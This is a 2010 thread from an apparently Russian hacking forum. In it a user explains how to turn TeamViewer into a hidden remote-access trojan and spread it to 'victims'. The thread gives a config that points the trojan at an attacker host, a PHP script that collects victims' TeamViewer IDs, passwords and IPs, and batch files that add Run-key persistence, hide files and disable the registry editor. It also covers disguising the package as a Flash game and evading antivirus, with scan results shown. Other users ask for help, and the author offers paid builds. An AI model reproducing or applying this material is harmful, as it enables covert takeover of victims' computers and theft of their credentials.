спайка Team Viewer
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
спайка Team Viewer - 2010-02-14 10:20:24.673333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
В догонку к радмину.
Начнем по пунктам:
1. Зарегестрируем себе Хост любой, на основе PHP. В данный момент я использую http://redz.ru (там уже сделали регистрацию платно :) )
2. FTP обменник у меня стоит FileZilla (http://www.filezilla.ru/)
3. Скачиваем наш TV
http://get.freesoft.ru/?id=103376
Защитный код: 8192359296
http://dump.ru/file/4378074
http://rapidshare.com/files/357170162/ts.rar.html
4. Распаковываем…. заходим в папку с TV, например C:\SOURCE\ и жмякаем на config.inc
Вводим свои данные ввиде:
poststat equ 'stat.php'
postidpass equ 'id='
host equ 'ваш_хост.hdd1.ru'
regkey equ 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
regname equ 'svсhost'
parol equ '6222';ровно 4 символа
fparol = 1 ; 1,установить статичьный пароль,0,пропустить
shell = 1 ; 0,пропустить,1,добавить
IP equ 'xxx.no-ip.biz'
port = 145
- Сохраняем. Жмякаем на "build" в папке TV.
Ваши введеные конфигурации вступили в силу, и записались в файл ts.dll этот же файл копируем в изночальную папку TV
например в C:\TV\…. с заменой предыдущего.
~ Сам TeamViewer у меня записан под именем Host (Прошу не путать) (в архиве он же TeamViewer)
5. Создает текстовик в виде "Stat.txt" и php в виде "Stat.php" - c данными:
_______
Stat.php
<?php
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$name = $_POST['id'];
$fp = fopen('stat.txt', 'a');
fwrite($fp,'Kod: ' .$name. ' Date and Time:' .$date. ' IP: ' .$ip. "\n");
fclose($fp);
?>
_______
~ Текстовик у нас остается чистым.
6. Заливаем на наш Хост в папку "www" файлы stat.txt and stat.php и забиваем в них права stat.php - 755 | stat.txt - 777
7. В папке TV выделяем файлы "Host" (он же TeamViewer) "tv.dll" и "ts.dll" и делаем из них Архив с параметром SFX.
8. Настраиваем архив, указываем путь на ваш выбор, у меня стоит %windir%, ставим функцию перезаписывать все файлы без
запроса.
~ Наш архив готов для отправки жертве.
После запуска \\\\ IP и PW жертвы, скиниться вам на Хост в stat.txt
_______
p.s. В архиве нету батника или dll с функцией автозапуска. В общем через часик залью…. Удачи.
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-14 10:42:44.993333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Вот элементарный autorun для запуска "Host'a" у жертвы ….
http://get.freesoft.ru/?id=103380
Защитный код: 9214427554
p.s. просто закрепите вместе с вашим архивом на TV этот bat and reg.
Главное незабудьте поставить в архиве SFX функцию автоматического запуска Bat-ника после распаковки.
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-14 10:47:37.523333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Вроде все внятно разжевал :) Спасибо за внимание! Спрашивайте если что …
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-14 10:52:36.183333
|
|
|
Plox
Сообщений: 847
Оценки: 0
Присоединился: 2008-07-14 11:08:04.600000
|
Интересненько…попробую)
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-14 11:05:18.070000
|
|
|
nub Nik
Сообщений: 263
Оценки: 0
Присоединился: 2009-11-18 10:53:00.250000
|
Barkass$ интересно +1 молодец))
Можно еще на HiAsm прогу накатать, что бы при включение проверяла наличие соединения с инетом, и если есть отправляла ip на мыло, кому нужно, могу в личку скинуть, писать туда же
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-14 12:33:43.270000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
:) Тестите… недочеты ложите тут, исправим. :)
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-14 13:07:02.383333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Если что, вот оригинал TV/ хост\клиент\сервер - http://www.teamviewer.com/download/index.aspx
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-16 19:41:13.280000
|
|
|
falshivka_efp
Сообщений: 20
Оценки: 0
Присоединился: 2010-02-11 19:09:51.236666
|
попробую,
Еще предложения?
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-16 19:46:44.710000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
попробую,
Еще предложения?
Эта тема касается вопросов чисто по TV, будь добр, флуд в своем топике :)
http://forum.xakep.ru/m_1714580/tm.htm
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-25 06:37:04.216666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Теме ап :) Можно еще сделать, или заменить батник
quote:
Вот элементарный autorun для запуска "Host'a" у жертвы ….
http://get.freesoft.ru/?id=103380
Защитный код: 9214427554
p.s. просто закрепите вместе с вашим архивом на TV этот bat and reg.
Главное незабудьте поставить в архиве SFX функцию автоматического запуска Bat-ника после распаковки.
Ввиде:
@echo off
copy ""%0"" "%windir%\winlog.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "winlog" /t REG_SZ /d "%SystemRoot%\system32\winlog.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul Записывает в реестр как (Run) и блочит запуск реестра от пользователя.
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-25 06:43:38.366666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Теме ап :) Можно еще сделать, или заменить батник
quote:
Вот элементарный autorun для запуска "Host'a" у жертвы ….
http://get.freesoft.ru/?id=103380
Защитный код: 9214427554
p.s. просто закрепите вместе с вашим архивом на TV этот bat and reg.
Главное незабудьте поставить в архиве SFX функцию автоматического запуска Bat-ника после распаковки.
Ввиде:
@echo off
copy ""%0"" "%windir%\winlog.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "winlog" /t REG_SZ /d "%SystemRoot%\system32\winlog.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul Записывает в реестр как (Run) и блочит запуск реестра от пользователя.
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-25 06:46:34.366666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Ой, аж 2 раза накатал :)
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-28 22:20:07.183333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Up
Начнемс…
Впаривание TV под предлогом флеш-игры.
Итак…. нам понадобятся наши ранее созданные файлы, а это:
1.ts.dll
2.TV.dll
3.Host.exe -(он же сам TV) - нужно заменить название на updаtе.exe - Для правильности работы SFX так нужно + меньше палиться, коли это игра.
_____________________________________________________________________________________________
1. Создаем батник с названием config.bat в виде:
@echo off
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v updаtе /t REG_SZ /d "%windir%\updаtе.exe" /f
attrib +h +s +r C:\windows\updаtе.exe
attrib +h +s +r C:\windows\TV.dll
attrib +h +s +r C:\windows\ts.dll
"C:\windows\Cat-Vacl.exe"
del /f /q "C:\windows\updаtе_Cat.exe"
"C:\windows\updаtе.exe" _____________________________________________________________________________________________
Скачиваем наш Cat-Vac.exe
http://dump.ru/file/4377884
_____________________________________________________________________________________________
Теперь читаем досконально по моим губам:
1.Выделяем
quote:
1.ts.dll
2.TV.dll
3.Host.exe -(он же сам TV) - нужно заменить название на updаtе.exe - Для правильности работы SFX так нужно + меньше палиться, коли это игра.
4. И наш config.bat
Делаем архив, называем его updаtе_Cat.exe (автоматически задается формат SFX)
Заходим в функцию SFX:
| Пишим с верху путь %windir% |
| Ниже указываем прямой путь к нашему Bat (C:\windows\config.bat) |
| Делаем распаковку "Скрытой" (в закладке "режимы") |
| Переходм в закладку "Обновление" выставляем режим перезаписи #2 (перезаписывать все файлы без запроса) |
Жмякаем "Ок" ….
_____________________________________________________________________________________________
Выделяем наш SFX Архив с названием updаtе_Cat.exe и нашу игру Cat-Vac.exe
Жмякаем создать архив. Называем его Cat-Vacl.exe
Задаем приоритеты:
quote:
| Пишим с верху путь %windir% |
| Ниже указываем прямой путь к нашему updаtе (C:\windows\updаtе_Cat.exe) |
| Делаем распаковку "Скрытой" (в закладке "режимы") |
| Переходм в закладку "Обновление" выставляем режим перезаписи #2 (перезаписывать все файлы без запроса) |
Жмякаем "Ок" ….
Все…. Заключение.
После открытия нашего отравленного ЕХЕ с игрой, жертве в корень windows прописывает 3 файла для TV, 1 файл для функции выполнения последовательности команд, и наша игра….
Так как статья для новичков, прошу обратить внимание на название файлов "красного цвета", ибо они разные. Например:
quote:
Скачиваем наш Cat-Vac.exe
quote:
Жмякаем создать архив. Называем его Cat-Vacl.exe
p.s. Для тех кто в танке, автозагрузка к этому TV уже включенна в пакет.
Выложил бы готовый архив, только смысла невижу, в ts.dll прописки Хвостов разные.
Советую пользоваться криптором (хотя хорошие на сегодняшний день платные, но все же) ибо спасают.
Вот что показывает нам, глобальный ВТ после ридеректа кода. Результат не из лучших, но самыми ходовыми антивирусами не палиться…
Антивирус Версия Обновление Результат
a-squared 4.5.0.50 2010.02.27 -
AhnLab-V3 5.0.0.2 2010.02.26 -
AntiVir 8.2.1.176 2010.02.26 BDS/Sheldor.DB.2
Antiy-AVL 2.0.3.7 2010.02.26 -
Authentium 5.2.0.5 2010.02.27 -
Avast 4.8.1351.0 2010.02.27 -
Avast5 5.0.332.0 2010.02.26 -
AVG 9.0.0.730 2010.02.26 -
BitDefender 7.2 2010.02.27 -
CAT-QuickHeal 10.00 2010.02.27 -
ClamAV 0.96.0.0-git 2010.02.27 -
Comodo 4081 2010.02.27 -
DrWeb 5.0.1.12222 2010.02.27 -
eSafe 7.0.17.0 2010.02.25 -
eTrust-Vet 35.2.7331 2010.02.26 -
F-Prot 4.5.1.85 2010.02.26 -
F-Secure 9.0.15370.0 2010.02.27 -
Fortinet 4.0.14.0 2010.02.27 -
GData 19 2010.02.27 Win32:Trojan-gen
Ikarus T3.1.1.80.0 2010.02.27 -
Jiangmin 13.0.900 2010.02.27 Backdoor/Sheldor.cc
K7AntiVirus 7.10.984 2010.02.26 -
Kaspersky 7.0.0.125 2010.02.27 -
McAfee 5904 2010.02.26 -
McAfee+Artemis 5904 2010.02.26 Artemis!A44D1D331EC5
McAfee-GW-Edition 6.8.5 2010.02.27 -
Microsoft 1.5502 2010.02.27 -
NOD32 4899 2010.02.26 -
Norman 6.04.08 2010.02.27 -
nProtect 2009.1.8.0 2010.02.27 -
Panda 10.0.2.2 2010.02.26 -
PCTools 7.0.3.5 2010.02.27 Backdoor.Sheldor
Prevx 3.0 2010.02.27 -
Rising 22.36.05.04 2010.02.27 -
Sophos 4.50.0 2010.02.27 Mal/Generic-A
Sunbelt 5702 2010.02.27 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.02.27 Suspicious.ADH
TheHacker 6.5.1.6.213 2010.02.27 -
TrendMicro 9.120.0.1004 2010.02.27 -
VBA32 3.12.12.2 2010.02.26 Backdoor.Win32.Sheldor.db
ViRobot 2010.2.27.2206 2010.02.27 -
VirusBuster 5.0.27.0 2010.02.26 Backdoor.Sheldor.FP
|
|
|
|
|
RE: спайка Team Viewer - 2010-02-28 22:34:52.400000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Перезалил ссылки на сам TV (сказали что уже битые…)
quote:
3. Скачиваем наш TV
http://get.freesoft.ru/?id=103376
Защитный код: 8192359296
http://dump.ru/file/4378074
http://rapidshare.com/files/357170162/ts.rar.html
|
|
|
|
|
RE: спайка Team Viewer - 2010-03-01 17:01:14.030000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Up.
По прозьбам сделал видео по настройке TV [sm=ab.gif]
http://dump.ru/file/4380651
Сжал по максимуму, чуть код не повредил [sm=ab.gif]
|
|
|
|
|
RE: спайка Team Viewer - 2010-03-02 13:01:21.553333
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Показал бы уж дальше)) подключение и т.п.)) че можно сотворить с компом) у начинающих бы быстро глаза на лоб полезли и они б глаз от моника не отвели)
|
|
|
|
|
RE: спайка Team Viewer - 2010-03-02 13:08:17.330000
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Кстати он получается отсылает IP при запуске TV ?
И + TV в автозагрузку сует… одна проблемка у некоторых интернет пашет только после
подключения… а некоторые модем включают позже ПК, с этим что поделать?
|
|
|
|
|
RE: спайка Team Viewer - 2010-03-02 15:43:03.550000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
Кстати он получается отсылает IP при запуске TV ?
И + TV в автозагрузку сует… одна проблемка у некоторых интернет пашет только после
подключения… а некоторые модем включают позже ПК, с этим что поделать?
Да я уже все как бы сделал :) В автозагрузку он сам лезет, тайм бек 1|`60000 стоит.(т.е. Host.exe начинает искать подключение к Хосту с 1 сек и до 6 часов) :) + если жертва обновляет соединение "Подключение к инету" Host.exe автоматом жрет свежие данные.
quote:
Кстати он получается отсылает IP при запуске TV ?
IP ID PW (ID и PW для подключения к удаленной машины, естественно через клиент TV)
quote:
Если что, вот оригинал TV/ хост\клиент\сервер - http://www.teamviewer.com/download/index.aspx
|
|
|
|
|
RE: спайка Team Viewer - 2010-03-02 17:36:21.673333
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
ок) все ясно) спс
кто помнит как куллеры в ПК отрубать?))
достали читаки в кс…)
|
|
|
|
|
RE: спайка Team Viewer - 2010-03-02 19:38:40.456666
|
|
|
CIH2009
Сообщений: 52
Оценки: 0
Присоединился: 2009-02-06 18:30:21.090000
|
Это немного устарело.Уже есть отстук при каждом подключении к интернету,можно указывать дополнительные хосты,на случай,если какой то их хостов умрёт,то будет перенаправление на другой.Так же появилась поддержка плагина и бот команд.Так же можно использовать самостоятельно любой билд теамвиевера этого класса.То есть получается подмена настоящей TV.dll на свою.
|
|
|
|
|
RE: спайка Team Viewer - 2010-05-01 00:59:16.660000
|
|
|
uniis
Сообщений: 4
Оценки: 0
Присоединился: 2008-09-16 21:21:14.350000
|
в чём может быть проблема?
перепробовал разные сборки, хоть ты тресни не отсылает логи
если просто зайти на sait.ru/stat.php
делает запись (без паса и id)
менял разные хостинги проверял всё досконально чистую систему ставил виртуаку и .т.д.
ни чего не помогает :(
может кто поделится ну или купил бы сборку
|
|
|
|
|
RE: спайка Team Viewer - 2010-05-01 02:34:01.453333
|
|
|
Zorgus
Сообщений: 1342
Оценки: 0
Присоединился: 2007-11-25 11:45:46.433333
|
Налипил же =) Сделай все в 1 посте и по порядку, а то глаза аж разбегаются.
|
|
|
|
|
RE: спайка Team Viewer - 2010-05-01 02:38:11.750000
|
|
|
ekZ
Сообщений: 159
Оценки: 0
Присоединился: 2010-04-29 02:53:32.270000
|
не чё се чес занимаются начинающие, я так и не догнал))))))
|
|
|
|
|
RE: спайка Team Viewer - 2010-05-01 06:20:59.060000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Так тема уже заброшена)) Ниче вы подняли).. Мне лень переписывать билдер, ТВ теперь палиться всеми вирями. Так что забейте)
quote:
Налипил же =) Сделай все в 1 посте и по порядку, а то глаза аж разбегаются.
По этой теме я делал видео, так что хрен на этот топик) он старый)
quote:
не чё се чес занимаются начинающие, я так и не догнал))))))
Если вам это не понятно, тогда не знаю, зачем вам это вообще нужно)
|
|
|
|
|
RE: спайка Team Viewer - 2010-05-01 06:27:42.150000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
в чём может быть проблема?
перепробовал разные сборки, хоть ты тресни не отсылает логи
если просто зайти на sait.ru/stat.php
делает запись (без паса и id)
менял разные хостинги проверял всё досконально чистую систему ставил виртуаку и .т.д.
ни чего не помогает :(
может кто поделится ну или купил бы сборку
Как вариант антивирь палит, и удаляет. Могу переписать билдер за денюшку …. Если что, стучи в аську.
|
|
|
|
|
|
